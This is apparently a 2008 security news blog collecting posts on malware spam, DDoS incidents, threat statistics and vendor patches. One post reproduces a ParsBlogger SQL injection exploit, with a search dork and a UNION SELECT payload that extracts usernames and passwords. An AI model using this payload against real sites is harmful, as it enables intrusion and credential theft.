29.11.08

Malware attacks decline from the US, but increase from China, Russia and Korea


Thirty-five percent of all Internet intrusion attacks are coming from Korea, according to Network Box. Analysis of all Internet threats in November by the company shows that Korea accounts for more than double the intrusions of its nearest competitor, the US (14 per cent).Spam and viruses are on the decline from the US, following the shutdown of the McColo spam hosting service earlier this month. Although over the full month, the US was the biggest source of spam and viruses, this dropped sharply towards the end of November, when China took the top spot in the spam charts.


Top Ten Viruses


Threat Name Daily Average %


1. spam.phish.url 35.67821


2. can-2003-0161 14.69491


3. trojan-spy.html.fraud.gen 5.30703


4.trojan-dropper.win32.agent.yzp 4.05881


5.nbh-bscript 3.16169


6.spam.porn.spam_nb_porn_subj_csk_1 2.50091


7.nbh-multext 2.35456


8. policy_prohibits_'exe'_nested_at 1.79322


9.Trojan-psw.win32.agent.lcc 1.78064


10. clm.html.phishing.pay-36 1.31201


Top Ten Trojans


Threat Name Daily Average %


1. trojan-spy.html.fraud.gen 0.11455


2. trojan-dropper.win32.agent.yzp 0.09805


3. trojan-psw.win32.agent.lcc 0.05511


4. trojan-spy.win32.zbot.fql 0.03281


5. trojan-spy.win32.zbot.frh 0.02655


6. clm.trojan.agent-61609 0.01474


7. trojan.win32.agent.amzt 0.01355


8. trojan-downloader.win32.small.afzf 0.00847


9. trojan-spy.win32.zbot.ghq 0.00711


10. trojan-downloader.win32.agent.anaq 0.00636


Top Ten Intrusions


Threat Name Daily Average %


1. NETBIOS 35.61600


2. BOGON 13.72736


3. PINGFLOOD 7.14538


4. HTTP-S-WEBDAV 0.03116


5. ICMP 0.02818


6. HTTP-S-WEBDEX 0.01964


7. SOBIG-F 0.01383


8. HTTP-S-NIMDA 0.00477


9. HTTP-S-UNIXATTACK 0.00439


10. HTTP-S-IISATTACK 0.00378


Top Ten Sources of Viruses


Country Daily Average %


1. US 19.49704


2. China 6.49728


3. Korea 6.36452


4. Australia 5.46776


5. UK 4.40333


6. Ukraine 4.39740


7. Turkey 3.88654


8. Russia 3.60779


9. Brazil 3.42233


10. Spain 2.77787


Top Ten Sources of Spam


Country Daily Average %


1. US 14.43738


2. China 9.99901


3. Korea 6.67193


4. Turkey 6.31428


5. Australia 5.94338


6. UK 4.46450


7. Brazil 4.19417


8. Spain 4.10385


9. Russia 3.83448


10. Poland 2.77324


Top Ten Sources of Intrusions


Country Daily Average %


1. Korea 34.90125


2. US 15.97265


3. Hong Kong 8.88417


4. China 8.45910


5. Malaysia 5.59282


6. Australia 3.90484


7. Turkey 1.46664


8. Brazil 1.15039


9. UK 1.00705


10. Poland 0.95489

Paypal Is Being Used In Popular Nigerian 419 Scam

A new variant of popular Nigerian 419 scam is possible via Paypal, according to report by Inquirer. The 419 scam is named after the relevant section of the Nigerian Criminal Code and the premise is always the same. Somebody offers to pay money into your account and give you a cut when you send it back. In truth the whole thing is money laundering but this latest twist – using Paypal – is significant because, on the surface, it looks like there’s no catch.
Instead of receiving the offer via email (as is normally the case), this person was approached over a Skype chat session. The perpetuator wants to transfer funds out a Paypal account and convert them back into US dollars. All the victim needed to do was check his Paypal account and when the money arrived, send a significantly lower amount back via Western Union.
Due to Paypal’s payment reversal policy, there is a loophole which enables the scam to work. As the payment would be classified as ’services’ rather than goods, there would be no proof that the the victim – who becomes the ‘vendor’ – provided any goods. So the ‘buyer’ – in this case the scammer – gets the money back. In the meantime, the vendor has sent the dollars via Western Union and then finds himself stuck with no means of recourse.
Both Western Union and Paypal can be blamed for making this scam work. Western Union makes it too easy to send and receive money anonymously while Paypal’s dispute resolution procedure system is a crude automated system.

28.11.08

Parsblogger Remote SQL Injection

Hack Detail :
--------------------------------------------------------------------------------------------------------------------[~] Script : ParsBlogger[~]
Version : >!<[~] Link : http://www.parsblogger.com/[~]
Dork : "Powered by ParsBlogger"[~]
Author : BorN To K!LL[~]
TeaM : Security Geeks [ Sec-Geeks.com ]
--------------------------------------------------------------------------------------------------------------------
[~] Exploit :.site.ir/blog.asp?wr=[SQL][~]
Example :.site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer----------------------------------------------------------------------------------------------------------------------[~] Greetings :.[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims--------------------------------------------------------------------------------------------------------------------

Infecting Christmas E-greetings Are Distributed Via Spam

Websense Security Labs has discovered that malware authors are already using Christmas themes this year as a social engineering tactic, in an effort to gain control over compromised machines. This campaign uses email messages in the form of e-greetings, leading to supposed animated postcards. These actually lead to a Trojan backdoor that has been distributed in previous malicious spam campaigns.
The email messages, spoofed to appear as though they have been sent from postcards.org, display an animated Christmas scene. A URL link within the email leads to a malicious file called postcard.exe hosted on various servers, including those in the .com domain space.
Once executed, a backdoor is created by the malware author enabling access and control over the resources of the compromised machine. Control is conducted over IRC, communicating with ircserver.*snip*.la. During the install process an image called xmas.jpg is displayed to the user as a distraction technique.
Example of malicious email:



Malware Infected Spam Threatens To Suspend Internet Access


Spammers are constantly using simple social engineering tactics that scare people into opening malicious files. This is definitely not a first time and it seems this method is rather successful. TrendLabs reports a new form of spam email containing a malicious file attachment that have been spreading over the Internet. This time the subject is “Your internet access is going to get suspended”. The spam email claims to come from ICS Monitoring Team telling recipients that they have to stop their illegal downloading of copyrighted material or else their Internet access will be suspended.
The spam email claims that a report of the recipient’s activities for the past six months is in the attached zipped file. Apparently, instead of the said report, the zipped file contains a malicious executable file named user-EA49943X-activities.exe.
The malicious file is currently detected as TROJ_MEREDROP.GJ by TrendLabs. It drops two files, both GOLDUN variants. This Trojans are known information stealers that monitor the Internet browsing activities of affected users. In this particular case the cyber-criminals intend to steal credentials related to the online banking site www.e-gold.com.
This is not the first time malware authors have disguised themselves as the ‘Internet police’. Trend Micro researchers already found spam which also presented users with the same ISP Consorcium spill used in the spam.


22.11.08

Top 5 free Hacking program

Netcat

Netcat is a featured networking utility which reads and writes data across network connections, using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Ophrack
Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.
Cain & Abel
Cain & Abel is a password recovery tool for Microsoft operating systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes and analyzing routing protocols.
John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix (eleven are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT, 2000, XP, 2003, LM hashes, plus several more with contributed patches.
SNORT
SNORT® is an open source network intrusion prevention and detection system utilizing a rule-driven language, which combines the benefits of signature, protocol and anomaly based inspection methods. With millions of downloads to date, Snort is the most widely deployed intrusion detection and prevention technology worldwide and has become the de facto standard for the industry.

Pentagon Hit by Unprecedented Cyber Attack


As a result of the cyber attack, the Defense Department has banned the use of external hardware devices throughout a vast network of military computers.

The Pentagon has suffered from a cyber attack so alarming that it has taken the unprecedented step of banning the use of external hardware devices, such as flash drives and DVD's, FOX News has learned.
The attack came in the form of a global virus or worm that is spreading rapidly throughout a number of military networks.
"We have detected a global virus for which there has been alerts, and we have seen some of this on our networks," a Pentagon official told FOX News. "We are now taking steps to mitigate the virus."
The official could not reveal the source of the attack because that information remains classified.
"Daily there are millions of scans of the GIG, but for security reasons we don't discuss the number of actual intrusions or attempts, or discuss specific measures commanders in the field may be taking to protect and defend our networks," the department said in an official statement.
Military computers are often referred to as part of the Global Information Grid, or GIG, a system composed of 17 million computers, many of which house classified or sensitive information.
FOX News obtained a copy of one memo sent out last week to an Army division within the Pentagon warning of the cyber attack.
"Due to the presence of commercial malware, CDR USSTRATCOM has banned the use of removable media (thumb drives, CDRs/DVDRs, floppy disks) on all DoD networks and computers effective immediately."
source : Fox News

12 Security Vulnerabilities Fixed In Apple iPhone OS 2.2 Update


Apple has released iPhone OS 2.2 with patches for 12 documented security flaws, some very serious. The vulnerabilities covered by the patch (which also affect iPod Touch) could allow remote code execution, information theft, software crashes and weakened encryption settings.
The updates include:
CVE-2008-2321: CoreGraphics contains memory corruption issues in the processing of arguments. Passing untrusted input to CoreGraphics via an application, such as a web browser, may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-2327: Multiple uninitialized memory access issues exist in libTIFF’s handling of LZW-encoded TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-1586: A memory exhaustion issue exists in the handling of TIFF images. Viewing a maliciously crafted TIFF image may lead to an unexpected device reset.
CVE-2008-4227: The encryption level for PPTP VPN connections may revert to a previous lower setting. This update addresses the issue by properly setting the encryption preferences.
CVE-2008-4211: An issue in Office Viewer’s handling of columns in Microsoft Excel files may result in an out-of-bounds memory access. Viewing a maliciously crafted Microsoft Excel file may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4228: iPhone provides the ability to make an emergency call when locked. Currently, an emergency call may be placed to any number. A person with physical access to an iPhone may take advantage of this feature to place arbitrary calls which are charged to the iPhone owner.
CVE-2008-4229: The Passcode Lock feature is designed to prevent applications from being launched unless the correct passcode is entered. A race condition in the handling of device settings may cause the Passcode Lock to be removed when the device is restored from backup. This may allow a person with physical access to the device to launch applications without the passcode.
CVE-2008-4230: If an SMS message arrives while the emergency call screen is visible, the entire SMS message is displayed, even if the “Show SMS Preview” preference was set to “OFF”. This update addresses the issue by, in this situation, displaying only a notification that a SMS message has arrived, and not its content.
CVE-2008-4231: A memory corruption issue exists in the handling of HTML table elements. Visiting a maliciously crafted website may lead to an unexpected application termination or arbitrary code execution.
CVE-2008-4232: Safari allows an iframe element to display content outside its boundaries, which may lead to user interface spoofing.
CVE-2008-4233: If an application is launched via Safari while a call approval dialog is shown, the call will be placed. This may allow a maliciously crafted website to initiate a phone call without user interaction. Additionally, under certain circumstances it may be possible for a maliciously crafted website to block the user’s ability to cancel dialing for a short period of time.
CVE-2008-3644: Disabling autocomplete on a form field may not prevent the data in the field from being stored in the browser page cache. This may lead to the disclosure of sensitive information to a person with physical access to an unlocked device.
There are still several known phishing and spamming flaws in iPhone that remain unfixed.

18.11.08

Website For The President Of Georgia Under Distributed Denial Of Service Attack

Steven Adair from Shadowserver reports a multi-pronged distributed denial of service (DDoS) attack against the website of President of Georgia, Mikhail Saakashvili (www.president.gov.ge). For over 24 hours the website has been rendered unavailable. The attack began very early Saturday morning (Georgian time). Shadowserver has observed at least one web-based command and control (C&C) server taking aim at the website hitting it with a variety of simultaneous attacks. The C&C server has instructed its bots to attack the website with TCP, ICMP, and HTTP floods.
The server [62.168.168.9] which houses the website has been largely offline since the attack started. Passive DNS records show the system houses several other websites which are mostly unrelated to the Georgian government. However, the server does also host the Social Assistance and Employment State Agency website (www.saesa.gov.ge). This website along with the others on the host have been rendered inaccessible.
The C&C server involved in these attacks is on the IP address 207.10.234.244, which is subsequently located in the United States. Shadowserver recommends blocking and/or monitoring for traffic to this address. Currently it appears the host site for 207.10.234.244 has taken action against this system and appears to now be blocking access to it. However, the server being targeted by the C&C is still unreachable.
Recent DDoS attacks against various other neighbors of Russia to include Estonia have been quite popular in the last few years. We do not have any solid proof that the people behind this C&C server are Russian. However, the HTTP-based botnet C&C server is a MachBot controller, which is a tool that is frequently used by Russian bot herders. On top of that the domain involved with this C&C server has seemingly bogus registration information but does tie back to Russia.
Update (July 22): Georgian authorities denied this attack. According to Interfax, Georgian press center claimed that the website worked without difficulties and the reports about a DDoS attack are false.

BBC Website Hit By DDoS Attack


The British Broadcasting Corporation (bbc.co.uk) was hit by a DDoS attack on Thursday, according to a statement sent to the Inquirer. The BBC said the attack originated in a number of different countries but didn’t specify which. When the BBC techies blocked international access to a limited subset of servers, it resulted in a marked improvement of the serving of bbc.co.uk. Service supplier Siemens was forced to block addresses and prevent the attack using other methods like changing the DNS settings.
The attack appears to have lasted for 1 hour and 15 minutes, which is the longest time the site has been offline during the entire 2008, was also confirmed by the distributed uptime monitoring company Pingdom earlier today. During the attack, the BBC website responded very slowly, and our monitoring shows that for a total of 1 hour and 15 minutes it did not respond at all. The downtime was spread over multiple short intervals, lasting just a few minutes each time. The attack lasted the entire evening. It started to have an effect after 5 p.m. CET and the performance was not back to normal until after 10 p.m. CET. Analyzing the response times of the website clearly shows the effect the DDoS attack had on the performance of the BBC website.
With the lack of specific details regarding the DDoS attack provided by the BBC, the reason for this attack is unclear.

13.11.08

Firefox 3.0.4, Firefox 2.0.0.18 And Seamonkey 1.1.13 Released, 11 Security Vulnerabilities Patched, 4 Of Them Critical


Mozilla has released a new version of its flagship Firefox browser to fix a total of 11 vulnerabilities that expose users to code execution, information stealing or denial-of-service attacks. Four of the 11 flaws covered with the new Firefox 3.0.4 are rated “critical” because of the risk of code execution attacks via specially rigged Web pages.
The four critical vulnerabilities are:
MFSA 2008-55 Crash and remote code execution in nsFrameManager. A vulnerability in part of Mozilla’s DOM constructing code can be exploited by modifying certain properties of a file input element before it has finished initializing. When the blur method of the modified input element is called, uninitialized memory is accessed by the browser, resulting in a crash. This crash may be used by an attacker to run arbitrary code on a victim’s computer.
MFSA 2008-54 Buffer overflow in http-index-format parser. This is a flaw in the way Mozilla parses the http-index-format MIME type. By sending a specially crafted 200 header line in the HTTP index response, an attacker can cause the browser to crash and run arbitrary code on the victim’s computer.
MFSA 2008-53 XSS and JavaScript privilege escalation via session restore. The browser’s session restore feature can be used to violate the same-origin policy and run JavaScript in the context of another site. Any otherwise unexploitable crash can be used to force the user into the session restore state. This vulnerability could also be used by an attacker to run arbitrary JavaScript with chrome privileges.
MFSA 2008-52 Crashes with evidence of memory corruption. Mozilla developers identified and fixed several stability bugs in the browser engine used in Firefox and other Mozilla-based products. Some of these crashes showed evidence of memory corruption under certain circumstances and we presume that with enough effort at least some of these could be exploited to run arbitrary code.
The Firefox update also fixes the following issues:
MFSA 2008-58 Parsing error in E4X default namespace.
MFSA 2008-57 -moz-binding property bypasses security checks on codebase principals.
MFSA 2008-56 nsXMLHttpRequest::NotifyEventListeners() same-origin violation.
MFSA 2008-51 file: URIs inherit chrome privileges when opened from chrome.
MFSA 2008-47 Information stealing via local shortcut files.
Mozilla recommends that users who still run FF2 upgrade to FF3 as soon as possible.

11.11.08

Introducing new vulnerability scanner

GFI LANguard N.S.S. makes use of state of the art vulnerability check databases based on OVAL and SANS Top 20, providing over 15,000 vulnerability assessments when your network is scanned. GFI LANguard N.S.S. gives you the information and tools you need to perform multi-platform scans across all environments, to analyze your network’s security health and effectively install and manage patches on all machines across different operating systems and in different languages. This results in a consistently configured environment that is secure against all vulnerabilities.
QualysGuard® Vulnerability Management (VM) automates the lifecycle of network auditing and vulnerability management across the enterprise, including network discovery and mapping, asset prioritization, vulnerability assessment reporting and remediation tracking according to business risk. Driven by the most comprehensive vulnerability KnowledgeBase in the industry, QualysGuard delivers continuous protection against the latest worms and security threats without the substantial cost, resource and deployment issues associated with traditional software. As an on demand Software-as-a-Service (SaaS) solution, there is no infrastructure to deploy or manage.
QualysGuard VM enables small to large organizations to effectively manage their vulnerabilities and maintain control over their network security with centralized reports, verified remedies, and full remediation workflow capabilities with trouble tickets. QualysGuard provides comprehensive reports on vulnerabilities including severity levels, time to fix estimates and impact on business, plus trend analysis on security issues.
By continuously and proactively .
Nessus 3.0 ( for windows , linux and others )
Passive vulnerability scanning is the process of monitoring network traffic at the packet layer to determine topology, services, and vulnerabilities. This document will discuss the technology of passive vulnerability scanning, its deployment issues, and its many applications. It will also compare passive vulnerability scanning technology to network intrusion detection technology. Example "plugins" used to detect network vulnerabilities is also included. This paper assumes the reader has a basic knowledge of TCP/IP networking, network intrusion detection, and vulnerability scanning.
Tenable offers the Passive Vulnerability Scanner (formerly NeVO). This paper not only serves as an introduction to passive vulnerability scanning, it also includes many examples specific to the Passive Vulnerability Scanner.

Barack Obama used for a malware spam attack

Archive:

Malware authors haven’t been slow reacting to the latest US elections news and President Elect Barrack Obama is already being used as a lure for infecting unsuspecting internet users.Here is a typical piece of spam that is being seen in Sophos spam traps around the world:



Were you to click on the link you would find yourself on a website pretending to be a news site offering information and a video of Barack Obama’s historic win. However, the site tries to fool you into installing what it claims is an update to Adobe Flash to view the video.

The file referenced is detected by Sophos as a piece of malware called Mal/Behav-027. It’s likely that the cybercriminals behind this attack will rotate the malware being served up by this dangerous website - so we will continue to monitor its activity as well as block access to the infected webpage with our web protection solutions.

9.11.08

Latest Virus Description !!

Trojan-Downloader.JS.Small.fi 29 Oct 2008 20:03:00 +030This Trojan downloads other files via the Internet and launches them for execution on the victim machine. The program is an HTML page which contains Java Script scenarios. It is 1432 bytes in size.
Trojan-PSW.Win32.OnLineGames.sxa 29 Oct 2008 20:01:00 +030This malicious program is a Trojan. It is a Windows PE EXE file. It is 118103 bytes in size. Installation The Trojan copies its executable file to the Windows system directory: %System%\kavo.exe In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-PSW.Win32.OnLineGames.lfi 29 Oct 2008 20:00:00 +030This malicious program is a Trojan. It is a Windows PE EXE file. It is 123873 bytes in size. Installation The Trojan copies its executable file to the Windows system directory: %System%\amvo.exe In order to ensure that the Trojan is launched automatically each time the system is restarted, the…
Trojan-Downloader_Win32_Agent.nmi 29 Oct 2008 19:59:00 +030This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. The size of infected files can range from 18KB to 47KB.
Trojan-Downloader.Win32.Braidupdate.c 28 Oct 2008 15:54:00 +030This Trojan downloads another program via the Internet and launches it on the victim machine without the user’s knowledge or consent. It is a Windows PE EXE file. It is 79360 bytes in size. It is written in C++. Installation In order to ensure that the Trojan is launched automatically each…
Trojan-Downloader.JS.Agent.sg 28 Oct 2008 15:52:00 +030This Trojan downloads other files via the Internet and launches them for execution on the victim machine. It is an HTML page which contains Visual Basic Script and Java Script. It is 677 bytes in size.
Trojan-GameThief.Win32.OnLineGames.tnys 28 Oct 2008 15:48:00 +030This Trojan is designed to steal account data from the online game LineAge2. It is a Windows PE EXE file. It is 654848 bytes in size.

8.11.08

White House Network Hacked By Chinese On Multiple Occasions


According to Demetri Sevastopulo from Financial Times, Chinese hackers have penetrated the White House computer network on multiple occasions, and obtained e-mails between government officials. US officials say Chinese hackers have raided White House email archives multiple times. The Financial Times reports some people it describes as “US government cyber experts” suspect the raids were sponsored by the Chinese regime.
Each attack cracked the unclassified network’s defenses for a short time. The classified network remained secure, according to Financial Times. The official said the Chinese cyber attacks had the hallmarks of the “grain of sands” approach taken by Chinese intelligence, which involves obtaining and pouring through lots of - often low-level - information to find a few nuggets.
“For a short period of time, they successfully breach a wall, and then you rebuild the wall  …  it is not as if they have continued access. It is constant cat and mouse on this stuff,” the source reportedly said.
The FT’s revelations came just days after Newsweek reported that both the Obama and McCain campaigns had been hacked from overseas, with large amounts of data downloaded, apparently in an attempt to track the candidates’ evolving policy positions. This could of course potentially help the unnamed foreign entities in future negotiations.
The campaign attacks were picked up by the authorities, with the FBI and the Secret Service notifying the Obama campaign back in August that what staffers thought was a virus was something more sinister.
“You have a problem way bigger than what you understand,” an FBI agent reportedly told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
The US has increased efforts to tackle cyber security, particularly since Chinese hackers believed to be associated with the Peoples’ Liberation Army last year perpetrated a major attack on the Pentagon.
US military computer experts battled for weeks against a sustained attack that eventually overcame the Pentagon’s defenses. The cyber attackers managed to obtain information and emails traffic from the unclassified computer system that supports Robert Gates, the defense secretary. Pentagon IT technicians were forced to take the network down for days to conduct repairs.
Concerns about Chinese hacking last year prompted President George W. Bush to tell reporters ahead of a meeting with President Hu Jintao of China that he might raise the issue with countries of concern.
Over the past year, the US government has tightened restrictions on officials using BlackBerrys and computers overseas, particularly in Russia and China, and sometimes bars them from removing the equipment from US government aircraft in the country.
In another incident, US government cyber investigators have determined that an attack this summer on the Obama and McCain campaign computer networks also originated in China. Details of the intrusion were first reported by Newsweek.
”There is no doubt that foreign governments are actively targeting cyber space not only for sensitive information but to influence our most sensitive processes such as the US presidential election,” said Sami Saydjari, head of the Cyber Defence Agency, a private company that advises government on hacking.
While the US has raised concerns about cyber attacks, many governments believe the US is also engaged in electronic spying. Bob Woodward, the veteran Washington Post reporter, this year revealed that the US had been spying on the Iraqi government.

Highly Critical Vulnerabilities In VLC Media Player

The issues, reported in versions 0.5.0 through 0.9.5, could let hackers take complete control of compromised machines through rigged media files. VideoLAN, the open-source group that manages the VLC project, has released patches and strongly recommends that users upgrade to VLC media player 0.9.6.
Exploitation of this issue requires the user to explicitly open a specially crafted file. As with any media player, the standard advice is to avoid from opening files from untrusted third parties or accessing untrusted remote sites.

Details:

Summary : Buffer overflows in VLC RealText and CUE demuxers
Date : November 2008
Affected versions : VLC media player 0.9.5 down to 0.5.0
ID : VideoLAN-SA-0810
CVE reference : CVE-2008-xxxx, CVE-2008-xxxx

Solution

VLC media player 0.9.6 addresses this issue. Patches for older versions are available from the official VLC source code repository 0.9-bugfix branch.

Daily Report

7.11.08

Break news

Facebook “added friend confirmation” Malicious Spam


Websense Security Labs has discovered another round of malicious Facebook messages. This campaign is another visual social-engineering spam campaign which tries to visually trick users into believing that the message is a legitimate added friend confirmation. The “From” address in the message is spoofed to make it look as if it was sent from Facebook, and the links look like they lead to Facebook.


In previous Facebook “add friend” Malicious Spam campaign, spammers included a malicious zip attachment that claimed to contain a picture, to entice the recipient to double-click on it. From a spammer’s perspective, the likelihood of attack success decreases when antivirus software picks up the attachment. If not picked up by antivirus software, then content learning technologies filter such messages and their attachments after receiving a certain volume of similar messages.


In order to maintain their attack over a longer time period with increased success rates, spammers have switched their tactics by including links to an external Web site. The use of external links in emails makes antivirus detection tougher, as not all antivirus software has the ability to scan or detect links included in email messages. Also, from a spammer’s perspective, using links consisting of compromised ‘legitimate’ domains hosting malware as a lure increases the success rate, as this is more likely to bypass security filters that rely heavily on reputation services.


Websense Security Labs sees these tactics adopted by spammers and malware authors as an ongoing trend, increasingly targeting Web 2.0 sites to carry out a wide range of attacks.


The links in the message actually lead to a malicious executable named “update.exe” (SHA1: a4dc17d1bcb191af75afedddf60aecbc2af2a37f).


This malicious executable has a very low AV detection. When run, the malicious executable steals data from its victim, establishing a connection with an IRC botnet.

Break News

After Election: Files Stolen In Obama And McCain Campaigns Cyberattack, Obama-themed Malware Makes Rounds

According to an article published Wednesday by Newsweek, hackers broke into computer systems of both the Barack Obama and John McCain campaigns and stole a large amount of data
Officials with the FBI and the Secret Service notified Obama staffers in August of the breach after tech consultants for the campaign detected what they thought at the time was a computer virus. “You have a problem way bigger than what you understand,” an FBI agent told Obama staff members. “You have been compromised, and a serious amount of files have been loaded off your system.”
White House chief of staff Josh Bolten also weighed in, telling an Obama campaign chief: “You have a real problem…and you have to deal with it.”
Investigators told Obama aides that the McCain computer systems had been similarly compromised. A senior McCain official confirmed to Newsweek that the campaign’s network had been hacked and the FBI was investigating.
According to investigators at the FBI and the White House, a “foreign entity or organization” is believed to be behind the attacks in an attempt to “gather information on the evolution of both camps’ policy positions.” The information could prove useful in negotiations with a future administration. The investigators told the Obama team the hack wasn’t carried out by political opponents.
Representatives of both campaigns weren’t available to comment on the Newsweek report.
Cyber criminals are actively capitalizing on Barack Obama’s victory in the US presidential race. Within 12 hours of his acceptance speech Tuesday night, net users were being treated to scams involving Google AdWords and prodigious volumes of spam.
The spam comes masked as dispatches from legitimate news sources, including the BBC and CNN, and invite readers to click a link to view a video of Obama accepting his country’s vote. Those who take the bait are sent to a spoof page of the news site that claims they need to update their Adobe Flash Player before viewing the speech.
In fact, Adobe_flash9.exe installs the notorious Trojan-PSW:W32/Papras.CL, according to anti-virus provider F-Secure. Earlier Wednesday, just 14 of the 36 major anti-virus programs detected the trojan, according to an analysis from VirusTotal. Once installed, the malware, which cloaks itself in a rootkit, logs passwords for bank sites and other sensitive information and sends them to a server located in Ukraine.
The fraudulent news sites are being hosted on a fast-flux network of infected machines, according to CyberCrime & Doing Time blog. Cloudmark, a company that provides spam filtering service, has already seen more than 10 million of the spam messages, according to the Zero Day blog.
Scammers were also exploiting the now-completed presidential race using Google’s Sponsored Links. Early Wednesday, searches related to the President Elect returned paid results that included links to websites that tried to install malware on end users’ machines, The Times Online reported. The malicious ads were no longer appearing on Google at time of writing.
The barrage of Obama-themed attacks are part of a broader trend of using current events to trick people into following links that lead to attacks. The US presidential election has been a favorite source of such attacks over the past year, with the names of candidates such as John McCain, Hillary Clinton, Ron Paul and Mike Huckabee all invoked.
source : cyberinsecure.com

Old Facebook Worm Using New Ways To Spread By Abusing Google Reader And Picasa Websites


Notice :

Researchers at unified threat management vendor Fortinet noticed that a program similar to the Koobface worm had started using the Google Reader and Picasa websites to spread. In the attack, criminals host images that look like YouTube videos on the Google sites in hopes of tricking victims into downloading malicious Trojan software.
Hackers initially unleashed Koobface in late July, but Facebook’s security team soon slowed its spread by blocking the webites that were hosting the malicious Trojan software. That has prompted the criminals to change tactics. In this latest attack they have hosted files that appear to be YouTube videos on Picasa and Google Reader and used Facebook to send them to victims.
The links appear safe because they go to Google sites, but once the victim arrives on the Google Reader or Picasa page, he is invited to click on a video or a web link. The victim is then told he needs to download special codec decompression software to view the video. That software is actually a malicious Trojan Horse program, which is blocked by most anti-virus programs, according to Facebook.
It could be the cyber-criminals behind Koobface have deliberately misspelled their Facebook messages to further help them evade detection by filters. This latest attack do not use the self-copying worm code that Koobface used last August, but it could easily be added.
Koobface has been a top security concern at Facebook since July. The worm’s creators have used Facebook’s instant messaging feature and also hosted their malicious links on sites such as Tinyurl.com and Bloglines.
Security experts have long warned that the Web 2.0 mash-up model of allowing users to put together their own content from many different sources naturally creates many security problems. In part, this is because it allows anyone to post material on trustworthy domains such as Google.
Facebook is working with Google to shut down the problem, said Facebook spokesman Barry Schnitt.


Founded: 30 oct 2008